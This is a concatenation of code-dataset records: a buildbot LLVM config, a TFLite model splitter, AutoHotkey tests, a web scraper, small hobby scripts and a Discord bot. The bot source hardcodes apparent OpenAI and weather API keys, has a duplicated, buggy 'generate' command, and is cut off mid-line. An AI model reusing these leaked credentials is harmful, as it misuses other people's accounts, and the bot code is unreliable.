\"/opt/cmake/bin:/usr/local/bin:/usr/bin:/bin\"\n },\n name=\"cmake\",\n description=\"cmake O3, Assertions, PIC, Static\"),\n ucompile(\"ninja\", \"install\", haltOnFailure=True, name=\"build llvm\"),\n cmd(\"tar\", \"czf\", \"../llvm.tar.gz\", \"-C\", \"./_install\", \".\")\n ]\n upload_llvm = hash_upload_to_master(\"llvm.tar.gz\",\n \"../llvm.tar.gz\", \"public_html/llvm.tar.gz\", URL)\n steps.extend(upload_llvm)\n\n c['builders'].append(builder(\"build-llvm\", None, accepted_builders,\n tags=['polyjit'], factory=BuildFactory(steps)))\n\ndef schedule(c):\n c['schedulers'].extend([\n s_sbranch(\"build-llvm-sched\", codebase, [\"build-llvm\"], branch=\"master\",\n treeStableTimer=2*60),\n s_force(\"force-build-llvm\", force_codebase, [\"build-llvm\"]),\n s_trigger(\"trigger-build-llvm\", codebase, ['build-llvm']),\n s_nightly(\"nightly-sched-build-llvm\", codebase,\n [\"build-llvm\"],\n hour=20, minute=0)\n ])\n# yapf: enable\n\n\n# register(sys.modules[__name__])\n","repo_name":"PolyJIT/buildbot","sub_path":"polyjit/buildbot/builders/llvm.py","file_name":"llvm.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"72398954027","text":"import os\nimport json\nfrom .utils import RunTerminalCommand, ReadJSON, CopyFile, MoveFile\nfrom ..logging.logger import log\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\nMODELS_DIR = os.path.join(WORK_DIR, \"models\")\nMAPPING_DIR = os.path.join(WORK_DIR, \"mapping\")\nRESOURCES_DIR = os.path.join(WORK_DIR, \"resources\")\nSOURCE_DIR = os.path.join(MODELS_DIR, \"source\")\nSUB_DIR = os.path.join(MODELS_DIR, \"sub\")\nCOMPILED_DIR = os.path.join(MODELS_DIR, \"sub\", \"compiled\")\nFINAL_DIR = os.path.join(MODELS_DIR, \"final\")\n\nclass Model:\n def __init__(self, path_to_model: str, schema_path: str):\n self.paths = {\"json\": \"\",\n \"tflite\": \"\",\n \"edgetpu_tflite\": \"\"}\n for ext in self.paths.keys():\n if path_to_model.endswith(ext):\n self.paths[ext] = path_to_model\n self.schema = schema_path\n\n def Convert(self, source_ext: str, target_ext: str):\n try:\n if ([source_ext, target_ext] == [\"json\", \"tflite\"]):\n RunTerminalCommand(\"flatc\", \"-b\", self.schema, self.paths[\"json\"])\n tmp_filename = self.paths[\"json\"].split(\"/\")[-1].split(\".\")[0] + \".tflite\"\n self.paths[\"tflite\"] = self.paths[\"json\"].replace(source_ext, target_ext)\n MoveFile(tmp_filename, self.paths[\"tflite\"])\n elif ([source_ext, target_ext] == [\"tflite\", \"json\"]):\n RunTerminalCommand(\"flatc\", \"-t\", \"--strict-json\", \"--defaults-json\", self.schema, \"--\", self.paths[\"tflite\"])\n tmp_filename = self.paths[\"tflite\"].split(\"/\")[-1].split(\".\")[0] + \".json\"\n self.paths[\"json\"] = self.paths[\"tflite\"].replace(source_ext, target_ext)\n MoveFile(tmp_filename, self.paths[\"json\"])\n self.json = ReadJSON(self.paths[\"json\"])\n except Exception as e:\n import sys\n sys.exit(\"Couldn't convert using 'flatc': {}\".format(e))\n\n def Compile(self):\n if not os.path.exists(COMPILED_DIR):\n os.mkdir(COMPILED_DIR)\n compiling_command = \"/usr/bin/edgetpu_compiler -o {0} -s {1}\".format(COMPILED_DIR, self.paths[\"tflite\"])\n os.system(compiling_command)\n self.paths[\"edgetpu_tflite\"] = os.path.join(COMPILED_DIR, self.paths[\"tflite\"].split(\"/\")[-1].split(\".\")[0] + \"_edgetpu.tflite\")\n\nclass Submodel(Model):\n def __init__(self, source_model_json: dict, op_name: str, target_hardware: str, sequence_index: int):\n self.name = \"submodel_{0}_{1}_{2}\".format(sequence_index, op_name, \"bm\" if target_hardware.lower() == \"\" else target_hardware.lower())\n self.dirs = {\"json\": os.path.join(SUB_DIR, \"json\", self.name),\n \"tflite\": os.path.join(SUB_DIR, \"tflite\", self.name)}\n os.mkdir(self.dirs[\"json\"])\n os.mkdir(self.dirs[\"tflite\"])\n CopyFile(os.path.join(RESOURCES_DIR, \"shell\", \"shell_model.json\"),\n os.path.join(self.dirs[\"json\"], \"shell_model.json\"))\n super().__init__(path_to_model=os.path.join(self.dirs[\"json\"], \"shell_model.json\"),\n schema_path=os.path.join(RESOURCES_DIR, \"schema\", \"schema.fbs\"))\n self.json = ReadJSON(self.paths[\"json\"])\n self.source_model_json = source_model_json\n\n def AddOps(self, layers):\n \"\"\"Adds the appropriate operations, specified by the given layers, to\n the submodel in preparation for saving the submodel.\n\n Args:\n layers (_type_): List of layer mappings, ie. 
(layer index, layer\n type, target hardware) tupples, that should be converted into a submodel.\n \"\"\"\n\n #Read Main Graph\n source_graph = self.source_model_json[\"subgraphs\"][0].copy()\n\n #Add version\n new_version = self.source_model_json[\"version\"]\n\n #Add Operators from Main Graph and add them according to index op\n new_ops = []\n for op_index in [layer[0] for layer in layers]:\n new_ops.append(source_graph[\"operators\"][op_index])\n\n #Add the OperatorCodes of the Newly added Operators and update their opcode_index\n new_opcodes = []\n for new_op in new_ops:\n if self.source_model_json[\"operator_codes\"][new_op[\"opcode_index\"]] not in new_opcodes:\n new_opcodes.append(self.source_model_json[\"operator_codes\"][new_op[\"opcode_index\"]].copy())\n new_op[\"opcode_index\"] = len(new_opcodes) - 1\n else:\n new_op[\"opcode_index\"] = new_opcodes.index(self.source_model_json[\"operator_codes\"][new_op[\"opcode_index\"]])\n\n #Add Tensors according to added Operators\n new_tensors = []\n tensor_indexes = []\n for new_op in new_ops:\n for entry in [\"inputs\", \"outputs\"]:\n for i, op_entry in enumerate(new_op[entry]):\n if op_entry in tensor_indexes:\n new_op[entry][i] = new_tensors.index(source_graph[\"tensors\"][op_entry])\n else:\n tensor_indexes.append(op_entry)\n new_tensors.append(source_graph[\"tensors\"][op_entry].copy())\n new_op[entry][i] = len(new_tensors) - 1\n\n #Add Submodel Input and Output Tensors\n new_inputs = []\n new_outputs = []\n if new_opcodes[new_ops[0][\"opcode_index\"]][\"deprecated_builtin_code\"] == 0:\n for i_t in new_ops[0][\"inputs\"]:\n new_inputs.append(i_t)\n else:\n new_inputs.append(new_ops[0][\"inputs\"][0])\n\n new_outputs.append(new_ops[-1][\"outputs\"][0])\n\n\n\n #Add Subgraph Name\n if \"name\" in source_graph.keys():\n new_subgraph_name = source_graph[\"name\"]\n self.json[\"subgraphs\"][0][\"name\"] = new_subgraph_name\n else:\n self.json[\"subgraphs\"][0].pop(\"name\", None)\n\n #Add Description\n new_description = self.source_model_json[\"description\"]\n\n #Add Buffers according to the newly added Tensors\n new_buffers = [{}]\n for i,new_tensor in enumerate(new_tensors):\n buffer_index = new_tensor[\"buffer\"]\n if (buffer_index > 0):\n new_buffers.append(self.source_model_json[\"buffers\"][buffer_index].copy())\n new_tensor[\"buffer\"] = len(new_buffers) - 1\n\n #Add metadata\n new_metadata = []\n if \"metadata\" in self.source_model_json.keys():\n for i, source_metadata in enumerate(self.source_model_json[\"metadata\"]):\n new_buffers.append(self.source_model_json[\"buffers\"][source_metadata[\"buffer\"]].copy())\n new_metadata.append(source_metadata)\n new_metadata[-1][\"buffer\"] = len(new_buffers) - 1\n self.json[\"metadata\"] = new_metadata\n else:\n self.json.pop(\"metadata\", None)\n\n #Add SignatureDefs\n #for i, sig_def in enumerate(self.source_model_json[\"signature_defs\"]):\n # for entry in [\"inputs\", \"outputs\"]:\n # for this_entry in sig_def[entry]:\n # if this_entry[\"tensor_index\"] in tensor_indexes:\n # self.json[\"signature_defs\"][i] = self.source_model_json[\"signature_defs\"][i].copy()\n # self.json[\"signature_defs\"][i][entry][\"tensor_index\"]\n\n\n #Update all fields\n self.json[\"version\"] = new_version\n self.json[\"operator_codes\"] = new_opcodes\n\n self.json[\"subgraphs\"][0][\"tensors\"] = new_tensors\n self.json[\"subgraphs\"][0][\"inputs\"] = new_inputs\n self.json[\"subgraphs\"][0][\"outputs\"] = new_outputs\n self.json[\"subgraphs\"][0][\"operators\"] = new_ops\n\n\n 
self.json[\"description\"] = new_description\n self.json[\"buffers\"] = new_buffers\n\n def Save(self):\n \"\"\"Saves a submodel to a JSON file, labeled using the target hardware,\n the index of the sequence, and the indexes of the layers (in their model)\n that are contained withing the submodel.\n Args:\n target_hardware (str): Name of the hardware that the submodel is to\n be executed on\n sequence_index (int): The index at where the sequence appears in the\n set of sequences to be run on the respective hardware\n \"\"\"\n submodel_filename = f\"{self.name}.json\"\n submodel_filepath = os.path.join(self.dirs[\"json\"], submodel_filename)\n MoveFile(self.paths[\"json\"], submodel_filepath)\n self.paths[\"json\"] = submodel_filepath\n with open(submodel_filepath, \"w\") as fout:\n json.dump(self.json, fout, indent=2)\n","repo_name":"alxhoff/TensorDSE","sub_path":"utils/splitter/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16660491765","text":"import asyncio\nimport time\nimport unittest\n\nimport pytest\n\nfrom ahk import AHK\n\n\nsleep = time.sleep\n\n\nclass TestGui(unittest.TestCase):\n def setUp(self) -> None:\n self.ahk = AHK()\n\n def tearDown(self) -> None:\n self.ahk._transport._proc.kill()\n time.sleep(0.2)\n\n def test_msg_box(self):\n box = self.ahk.msg_box(text='hello', title='test', timeout=3, blocking=False)\n sleep(1)\n win = self.ahk.win_get(title='test')\n assert win is not None\n with pytest.raises(TimeoutError):\n r = box.result()\n\n def test_input_box(self):\n box = self.ahk.input_box(prompt='Question', title='prompt', timeout=3, blocking=False)\n sleep(1)\n win = self.ahk.win_get(title='prompt')\n assert win is not None\n with pytest.raises(TimeoutError):\n r = box.result()\n\n\nclass TestGuiV2(TestGui):\n def setUp(self) -> None:\n self.ahk = AHK(version='v2')\n","repo_name":"spyoungtech/ahk","sub_path":"tests/_sync/test_gui.py","file_name":"test_gui.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":741,"dataset":"github-code","pt":"37"} +{"seq_id":"8746969070","text":"from bs4 import BeautifulSoup\nimport requests\n\nurl_ec = 'https://scraping.official.ec/'\nres = requests.get(url_ec)\nsoup = BeautifulSoup(res.text, 'html.parser')\nitem_list = soup.find('ul', {'id': 'itemList'})\nitems = item_list.find_all('li')\n\ndata_ec = []\nfor item in items:\n datum_ec = {}\n datum_ec['title'] = item.find('p', {'class': 'items-grid_itemTitleText_b58666da'}).text\n price = item.find('p', {'class': 'items-grid_price_b58666da'}).text\n datum_ec['price'] = int(price.replace('¥', '').replace(',', ''))\n datum_ec['link'] = item.find('a')['href']\n is_stock = item.find('p', {'class': 'items-grid_soldOut_b58666da'}) == None\n datum_ec['is_stock'] = '在庫あり' if is_stock == True else '在庫なし'\n data_ec.append(datum_ec)\n print(data_ec)","repo_name":"takuma123-type/Python-web--Scraping","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7505353680","text":"# Planet Radius (compared to Earth)\n# Re = (drop%/100%)^(1/2) * Star Radius * 109\n\n# Planet Radius (compared to Jupiter)\n#Rj = Re * 0.0892\n\n# Kepler's 3rd Law\n# period ^ 2 * star mass = orbital radius ^ 3\n\nluminosity = 2.184\ntemperature = 6465\nmass = 1.25\nradius = 1.19\nperiod_days = 
290\nperiod_years = 0.7945205479452054\n\norbital_radius = ((period_years**2) * mass)**(1/3)\nprint(orbital_radius)\n\nradius_earth = ((0.14000000000000057/100)**(1/2))*radius*109\nprint(radius_earth)\n\nradius_jupiter = radius_earth * 0.0892\nprint(radius_jupiter)\n\n","repo_name":"IraLeeBell/solar-systems-astronomy","sub_path":"solar-systems-astronomy/transits-math.py","file_name":"transits-math.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18486057578","text":"#!/usr/bin/env python\nimport time\n\nimport Boards\nfrom Data import Database\n\n\ndef runBoards():\n tempBoard = Boards.TemperatureBoard()\n lightBoard = Boards.LightBoard()\n fanBoard = Boards.FanBoard()\n\n database = Database.Database.getInstance()\n sleepTimeSeconds = 180\n # don't leave the light on for more than 3 minutes\n lightFailsafeSeconds = 180\n lightOnSeconds = 0\n\n print('========================')\n print('| Celsius | Fahrenheit |')\n fmt = '|{cel:.2f}|{fah:.2f}|'\n try:\n while True:\n latestLog = tempBoard.logTemperature()\n print(fmt.format(cel=latestLog.tempCelsius, fah=latestLog.tempFahrenheit))\n if latestLog.tempCelsius < database.getLowerTemp():\n lightBoard.turnOn()\n sleepTimeSeconds = 60\n fanBoard.turnOff()\n elif latestLog.tempCelsius > database.getUpperTemp():\n lightBoard.turnOff()\n sleepTimeSeconds = 180\n fanBoard.turnOn()\n else:\n lightBoard.turnOff()\n sleepTimeSeconds = 180\n fanBoard.turnOff()\n\n if lightBoard.turnedOn and lightOnSeconds >= lightFailsafeSeconds:\n lightBoard.turnOff()\n\n if not lightBoard.turnedOn:\n lightOnSeconds = 0\n\n if lightBoard.turnedOn:\n lightOnSeconds += sleepTimeSeconds\n\n time.sleep(sleepTimeSeconds)\n finally:\n lightBoard.turnOff()\n fanBoard.turnOff()\n\n\nif __name__ == '__main__':\n runBoards()\n","repo_name":"sjyn/FermentationChamber","sub_path":"server/Boards/BoardController.py","file_name":"BoardController.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11196617565","text":"import os\nimport src.services.utils as utils\nfrom src.models import *\nfrom src import cfg, db\nimport src.repositories as repository\n\n\nclass Preprocessor:\n def __init__(self):\n self.dataset_dir = cfg.dataset_dir\n self.embeddingsComputer = utils.EmbeddingsComputer()\n\n def start(self):\n all_file_names = os.listdir(self.dataset_dir)\n processed_texts = Text.query.all()\n not_processed_file_names = [file_name for file_name in all_file_names if file_name not in [textModel.file_name for textModel in processed_texts]]\n print(f'se van a procesar {len(not_processed_file_names)} de un total de {len(all_file_names)}')\n for file_name in not_processed_file_names:\n paragraphs = utils.Parser(file_name, self.dataset_dir).parse()\n if len(paragraphs):\n text_preprocessed = utils.Cleaner(paragraphs).preprocess()\n bigrams = utils.NGramsCalculculator(text_preprocessed).get_bigrams()\n text_embeddings = self.embeddingsComputer.compute(text_preprocessed)\n repository.TextRepository(self.dataset_dir).save(file_name, text_embeddings, bigrams)\n","repo_name":"Fluzko/NLP-Plagiarism-detection","sub_path":"api/src/services/preprocessor/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26759063650","text":"import discord\nfrom CalC 
import add, subtract, multiply, division, remainder\nfrom twilio_message import *\nfrom Onliner import keep_alive\n\nintents = discord.Intents.default()\nintents.members = True\nclient = discord.Client(intents=intents)\n\ntoken_file = open(\"discord_token.txt\", \"r\")\ntoken = token_file.read()\n\n\n@client.event\nasync def on_ready():\n print( str(client.user) + \" is Ready!!\")\n\n\n@client.event\nasync def on_message(message):\n if client.user == message.author:\n pass\n elif message.content.startswith(\"add\"):\n addResult = add(message.content)\n await message.channel.send(addResult.getResult())\n elif message.content.startswith(\"sub\"):\n subResult = subtract(message.content)\n await message.channel.send(subResult.get_result())\n elif message.content.startswith(\"multiply\"):\n mul_result = multiply(message.content)\n await message.channel.send(mul_result.get_result())\n elif message.content.startswith(\"div\"):\n divResult = division(message.content)\n await message.channel.send(divResult.get_result())\n elif message.content.startswith(\"rem\"):\n remResult = remainder(message.content)\n await message.channel.send(remResult.get_result())\n elif message.content.startswith(\"sms\"):\n sms = twilio_message(message.content)\n await message.channel.send(sms.send_sms())\n\n \n\n\n@client.event\nasync def on_member_join(member):\n for channel in member.guild.channels:\n if str(channel) == \"member-log\":\n await channel.send(f\"{member.mention} Joined, Have a good time here!\")\n\n\n@client.event\nasync def on_member_remove(member):\n for channel in member.guild.channels:\n if str(channel) == \"member-log\":\n await channel.send(f'{member.mention} left, You won\\'t be missed(Probably xD)!')\n\n\nkeep_alive()\nclient.run(token)\n","repo_name":"SuperALKALINEdroiD/Discord-Bot","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39067540695","text":"import discord\r\nfrom discord import app_commands\r\nfrom discord.ext import commands\r\nimport psutil\r\nimport datetime\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nimport aiohttp\r\nimport time\r\nfrom io import BytesIO\r\nimport base64\r\nfrom discord.ui import view\r\nfrom discord.interactions import Interaction\r\nimport requests\r\nimport random\r\n\r\n\r\n\r\nplayers = {}\r\n\r\nAPI_KEY = \"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\"\r\nAPI_KEYS =\"de306122167d419f85381454230704\"\r\n\r\n\r\nintents = discord.Intents.all()\r\nintents.typing = True\r\nbot = commands.Bot(command_prefix=\"!\", intents=intents)\r\n\r\n\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(\"Bot Running!\")\r\n try:\r\n synced = await bot.tree.sync()\r\n print(f\"Synced {len(synced)} command(s).\")\r\n except Exception as e:\r\n print(e)\r\n\r\n@bot.tree.command(name=\"help\", description=\"Display a list of available commands.\")\r\nasync def help_command(interaction: discord.Interaction):\r\n # Create a dictionary of available commands and their descriptions\r\n commands_dict = {\r\n \"/about\": \"Displays information about the bot.\",\r\n \"/invite\": \"Creates an invite link for the current channel and displays it in a button.\",\r\n \"/avatar\": \"Displays the avatar of a member..\",\r\n \"/aclear\": \"Deletes all messages in the channel.\",\r\n \"/serverinfo\": \"Displays information about the current server.\",\r\n \"/ask\": \"Get a response from OpenAI's GPT-3.\",\r\n \"/help\": \"Display a list of 
available commands.\",\r\n\r\n # Add more commands and descriptions here\r\n }\r\n \r\n # Create an embedded message to display the list of commands and descriptions\r\n embed = discord.Embed(title=\"Available Commands\", color=0x00ff00)\r\n for command, description in commands_dict.items():\r\n embed.add_field(name=command, value=description, inline=False)\r\n \r\n # Send the embedded message as a response to the /help command\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n\r\n\r\nWELCOME_CHANNEL_ID = 1057730489663885382 # Replace with the ID of your welcome channel\r\n\r\n@bot.event\r\nasync def on_member_join(member):\r\n # Get the welcome channel\r\n welcome_channel = bot.get_channel(WELCOME_CHANNEL_ID)\r\n\r\n # Create the welcome message embed\r\n embed = discord.Embed(title=f\"Welcome {member.display_name} to the server!\", color=discord.Color.green())\r\n embed.set_thumbnail(url=member.avatar.url)\r\n\r\n # Add a description to the embed\r\n embed.add_field(name=\"Introduction\", value=\"Thanks for joining our server. We hope you have a great time here!\", inline=False)\r\n\r\n # Send the embed to the welcome channel\r\n await welcome_channel.send(embed=embed)\r\n\r\n # Send a direct message to the new member\r\n # Create the message embed\r\n embed = discord.Embed(title=\"Welcome to our server!\", description=\"Before you start chatting, please make sure to follow the rules and guidelines below:\", color=discord.Color.green())\r\n embed.set_thumbnail(url=member.avatar.url)\r\n\r\n # Add the rules and guidelines to the embed\r\n embed.add_field(name=\"Rule 1: Be respectful to others in the server.\", value=\"Treat others with kindness and respect at all times.\")\r\n embed.add_field(name=\"Rule 2: No spamming or flooding the chat with messages.\", value=\"Please refrain from posting repetitive or unnecessary messages.\")\r\n embed.add_field(name=\"Rule 3: No adult content or NSFW content allowed.\", value=\"Any content that is not suitable for all ages is strictly prohibited.\")\r\n embed.add_field(name=\"Rule 4: No advertising or self-promotion without permission from the server staff.\", value=\"Please do not promote your own content or products without permission.\")\r\n embed.add_field(name=\"Rule 5: No hate speech, discrimination, or harassment of any kind.\", value=\"We do not tolerate any form of hate speech, discrimination, or harassment.\")\r\n embed.add_field(name=\"Rule 6: Do not share personal information or sensitive data.\", value=\"Please keep your personal information and sensitive data private and do not share it with others.\")\r\n embed.add_field(name=\"Rule 7: Follow the instructions of the server staff.\", value=\"Please follow the instructions of the server staff at all times.\")\r\n embed.add_field(name=\"Rule 8: Do not use bots or scripts to automate actions in the server.\", value=\"The use of bots or scripts to automate actions in the server is strictly prohibited.\")\r\n embed.add_field(name=\"Rule 9: No trolling or intentionally causing disruption in the server.\", value=\"Please do not engage in trolling or disruptive behavior.\")\r\n embed.add_field(name=\"Rule 10: Do not use offensive language or slurs.\", value=\"Please be mindful of the language you use and avoid using offensive slurs.\")\r\n\r\n # Send the embed to the new member\r\n await member.send(embed=embed)\r\n\r\n\r\n@bot.event\r\nasync def on_message(message):\r\n if not message.author.bot:\r\n if message.content.startswith('!weather') or 
message.content.startswith('!generate'):\r\n            await message.channel.send(f\"Please use the slash command '/{message.content[1:]}' instead of the regular command '{message.content}'\")\r\n        else:\r\n            await bot.process_commands(message)\r\n\r\n\r\n\r\n\r\n@bot.tree.command(name=\"aclear\", description=\"Deletes all messages in the channel.\")\r\n@commands.has_permissions(manage_messages=True)\r\nasync def aclear(interaction: discord.Interaction):\r\n    if not interaction.user.guild_permissions.manage_messages:\r\n        await interaction.response.send_message(\"❌ You do not have permission to use this command.\")\r\n        return\r\n\r\n    channel = interaction.channel\r\n\r\n    await channel.purge()\r\n\r\n    confirm_embed = discord.Embed(title=\"Clear Command Executed\", description=f\"All messages in {channel.mention} have been deleted by {interaction.user.mention}\", color=discord.Color.red())\r\n    confirm_embed.set_author(name=\"MultiVerse Hub Bot\")\r\n    # an interaction can only be responded to once, so send a single confirmation\r\n    await interaction.response.send_message(embed=confirm_embed)\r\n\r\n\r\n\r\n@bot.tree.command(name=\"avatar\", description=\"Displays the avatar of a member.\")\r\nasync def avatar(interaction: discord.Interaction, member: discord.Member):\r\n    avatar_url: str = member.avatar.url\r\n    embed: discord.Embed = discord.Embed(title=f\"Avatar of {member.name}\", color=member.color)\r\n    embed.set_image(url=avatar_url)\r\n    await interaction.response.send_message(embed=embed)\r\n\r\n\r\n\r\n@bot.tree.command()\r\nasync def about(interaction):\r\n    \"\"\"Displays information about the bot.\"\"\"\r\n    cpu_usage = psutil.cpu_percent()\r\n    # process uptime: elapsed time since the bot process was created\r\n    uptime = str(datetime.timedelta(seconds=int(time.time() - psutil.Process().create_time())))\r\n    embed = discord.Embed(title=\"About Bot\", color=0x00ff00)\r\n    embed.add_field(name=\"Bot Ping\", value=f\"{round(bot.latency * 1000)}ms\")\r\n    embed.add_field(name=\"Bot Code\", value=\"This bot was written in Python using the Discord.py library.\")\r\n    embed.add_field(name=\"Bot Author\", value=\"This bot was fully written by **Mohammad Sibbir**\")\r\n    embed.add_field(name=\"Servers Watching\", value=len(bot.guilds))\r\n    embed.add_field(name=\"CPU Usage\", value=f\"{cpu_usage}%\")\r\n    embed.add_field(name=\"Uptime\", value=uptime)\r\n    await interaction.response.send_message(embed=embed)\r\n\r\n@bot.tree.command(name=\"serverinfo\", description=\"Displays information about the current server.\")\r\nasync def serverinfo(interaction: discord.Interaction):\r\n    guild = interaction.guild\r\n    embed = discord.Embed(title=f\"{guild.name} ({guild.id})\", color=0x00ff00)\r\n    embed.set_thumbnail(url=guild.icon.url)\r\n    embed.add_field(name=\"Owner\", value=guild.owner.mention)\r\n    embed.add_field(name=\"Created At\", value=guild.created_at.strftime(\"%b %d, %Y\"))\r\n    embed.add_field(name=\"Members\", value=guild.member_count)\r\n    embed.add_field(name=\"Roles\", value=len(guild.roles))\r\n    embed.add_field(name=\"Text Channels\", value=len(guild.text_channels))\r\n    embed.add_field(name=\"Voice Channels\", value=len(guild.voice_channels))\r\n    await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@bot.tree.command(description=\"Get a response from OpenAI's GPT-3\")\r\nasync def ask(interaction: discord.Interaction, *, prompt: str):\r\n    async with aiohttp.ClientSession() as session:\r\n        payload = {\r\n            \"model\": \"text-davinci-003\",\r\n            \"prompt\": prompt,\r\n            \"temperature\": 0.5,\r\n            
\"max_tokens\": 50,\r\n \"presence_penalty\": 0,\r\n \"frequency_penalty\": 0,\r\n \"best_of\": 1,\r\n }\r\n headers = {\"Authorization\": f\"Bearer {API_KEY}\"}\r\n async with session.post(\"https://api.openai.com/v1/completions\", json=payload, headers=headers) as resp:\r\n response = await resp.json()\r\n embed = discord.Embed(title=\"MultiVerse Hub Response:\", description=response[\"choices\"][0][\"text\"])\r\n await interaction.response.send_message(embed=embed)\r\n\r\n@bot.tree.command()\r\nasync def weather(interaction: discord.Interaction, *, city: str):\r\n url = \"https://api.weatherapi.com/v1/current.json\"\r\n params = {\r\n \"key\": API_KEYS,\r\n \"q\": city\r\n }\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(url, params=params) as res:\r\n data = await res.json()\r\n location = data[\"location\"][\"name\"]\r\n temp_c = data[\"current\"][\"temp_c\"]\r\n temp_f = data[\"current\"][\"temp_f\"]\r\n humidity = data[\"current\"][\"humidity\"]\r\n wind_kph = data[\"current\"][\"wind_kph\"]\r\n wind_mph = data[\"current\"][\"wind_mph\"]\r\n condition = data[\"current\"][\"condition\"][\"text\"]\r\n condition_icon = data[\"current\"][\"condition\"][\"icon\"]\r\n image_url = \"https:\" + condition_icon\r\n embed = discord.Embed(title=f\"Weather For {location}\", description=f\"The condition in `{location}` is ` {condition}`\")\r\n embed.add_field(name=\"Temperature\", value=f\"c:{temp_c} | f: {temp_f}\")\r\n embed.add_field(name=\"Humidity\", value=f\"{humidity}\")\r\n embed.add_field(name=\"Wind Speeds\", value=f\"KPH: {wind_kph} | MPH: {wind_mph}\")\r\n embed.set_thumbnail(url=image_url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\nclass Dropdown(discord.ui.Select):\r\n def __init__(self, message, images, user):\r\n self.message = message\r\n self.images = images\r\n self.user = user\r\n\r\n options = [\r\n discord.SelectOption(label=\"1\"),\r\n discord.SelectOption(label=\"2\"),\r\n discord.SelectOption(label=\"3\"),\r\n discord.SelectOption(label=\"4\"),\r\n discord.SelectOption(label=\"5\"),\r\n discord.SelectOption(label=\"6\"),\r\n discord.SelectOption(label=\"7\"),\r\n discord.SelectOption(label=\"8\"),\r\n discord.SelectOption(label=\"9\"),\r\n ]\r\n\r\n super().__init__(\r\n placeholder=\"Choose the image you want to see!\",\r\n min_values=1,\r\n max_values=1,\r\n options=options,\r\n )\r\n\r\n async def callback(self, interaction: discord.Interaction):\r\n if not int(self.user) == int(interaction.user.id):\r\n await interaction.response.send_message(\"You are not the author of this message!\", ephemeral=True)\r\n return\r\n\r\n selection = int(self.values[0]) - 1\r\n image = BytesIO(base64.decodebytes(self.images[selection].encode(\"utf-8\")))\r\n embed = discord.Embed(title=\"Content Generated By Multiverse Hub\")\r\n await self.message.edit(content=None, embed=embed, file=discord.File(image, \"generatedImage.png\"), view=DropdownView(self.message, self.images, self.user))\r\n\r\n\r\nclass DropdownView(discord.ui.View):\r\n def __init__(self, message, images, user):\r\n super().__init__()\r\n self.message = message\r\n self.images = images\r\n self.user = user\r\n self.add_item(Dropdown(self.message, self.images, self.user))\r\n\r\n\r\n\r\n@bot.tree.command()\r\nasync def generate(interaction: Interaction, prompt: str):\r\n ETA = int(time.time() + 60)\r\n msg = await interaction.response.send_message(f\"Go grab a coffee, this may take some time.. 
ETA: \")\r\n async with aiohttp.request(\"POST\", \"https://backend.craiyon.com/generate\", json={\"Any Image Name\": prompt}) as resp:\r\n r = await resp.json()\r\n images = r['images']\r\n image = BytesIO(base64.decodebytes(images[0].encode(\"utf-8\")))\r\n embed = discord.Embed(title=\"Content Generated By Multiverse Hub\")\r\n await msg.delete()\r\n\r\n await interaction.response.send_message(content=None, embed=embed, file=discord.File(image, \"generatedImage.png\"), view=view.DropdownView(interaction, images, interaction.user.id))\r\n\r\nclass InviteButtons(discord.ui.View):\r\n def __init__(self, inv: str):\r\n super().__init__()\r\n self.inv = inv\r\n self.add_item(discord.ui.Button(label=\"Invite Link\", url=self.inv))\r\n\r\n @discord.ui.button(label=\"Invite Btn\", style=discord.ButtonStyle.blurple)\r\n async def inviteBtn(self, interaction: discord.Interaction, button: discord.ui.Button):\r\n await interaction.response.send_message(self.inv, ephemeral=True)\r\n\r\n@bot.tree.command(description=\"Creates an invite link for the current channel and displays it in a button.\")\r\nasync def invite(interaction: discord.Interaction):\r\n try:\r\n inv = await interaction.channel.create_invite()\r\n await interaction.response.send_message(\"Click the button below to invite someone!\", view=InviteButtons(str(inv)))\r\n except discord.errors.Forbidden:\r\n await interaction.response.send_message(\"I don't have permission to create an invite link. Please give me the necessary permissions.\")\r\n\r\n@bot.tree.command()\r\nasync def meme(interaction):\r\n response = requests.get('https://www.reddit.com/r/memes/random.json', headers={'User-agent': 'Mozilla/5.0'})\r\n data = response.json()[0]['data']['children'][0]['data']\r\n \r\n if not data['url'].endswith(('.jpg', '.jpeg', '.png')):\r\n await interaction.response.send_message(\"Sorry, I couldn't find any memes right now :(\")\r\n return\r\n \r\n embed = discord.Embed(title=data['title'], url=f\"https://www.reddit.com{data['permalink']}\")\r\n embed.set_image(url=data['url'])\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n\r\n@bot.tree.command()\r\nasync def generate(interaction: Interaction, prompt: str):\r\n ETA = int(time.time() + 60)\r\n msg = await interaction.response.send_message(f\"Go grab a coffee, this may take some time.. 
